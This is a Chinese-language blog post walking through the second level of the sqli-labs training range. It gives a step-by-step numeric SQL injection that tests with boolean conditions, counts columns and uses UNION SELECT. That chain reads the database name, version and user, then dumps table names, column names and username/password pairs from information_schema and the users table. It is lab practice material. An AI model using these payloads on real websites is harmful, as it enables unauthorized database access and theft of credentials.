SQL注入sqli_labs靶场第二题

解题思路与第一题相同

?id=1 and 1=1 和?id=1 and 1=2进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为数字型注入。

联合查询:

猜解列名数量:3

?id=1 order by 4

判断回显点

?id=-1 union select 1,2,3

爆库、版本号、权限

?id=-1 union select 1,database(),version()--+
?id=-1 union select 1,2,user()--+

爆表、爆列

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

爆账号密码

?id=-1 union select 1,2,(select group_concat(username,password))from users

相关推荐
Mico1826 分钟前
MySQL 8.0.35 GTID 主从复制搭建-基于GITD
android·mysql·adb
Ethan01072 小时前
Mybatis数据源切换
mysql
OneNobody2 小时前
Spark SQL AQE工作原理源码剖析
大数据·sql·spark
kali-Myon4 小时前
深入 MySQL 内核:从临时哈希表分配机制详解 Floor 报错注入核心原理
数据库·sql·mysql·安全·web
梦想画家5 小时前
用SQL驱动AI:Trino AI Functions跨源情报分析实战指南
sql·ai·trino
Ethan01076 小时前
pt-deadlock-logger 检测死锁
mysql
Ethan01076 小时前
数据库死锁-应用层重试
mysql
宠友信息18 小时前
消息序号如何保证即时通讯源码聊天记录稳定加载
java·spring boot·redis·python·mysql·uni-app
Csvn19 小时前
📊 SQL 入门 Day 6:多表查询 — JOIN 的四种姿势
后端·sql
笨蛋不要掉眼泪21 小时前
MySQL架构揭秘:慢查询日志详解
数据库·mysql·架构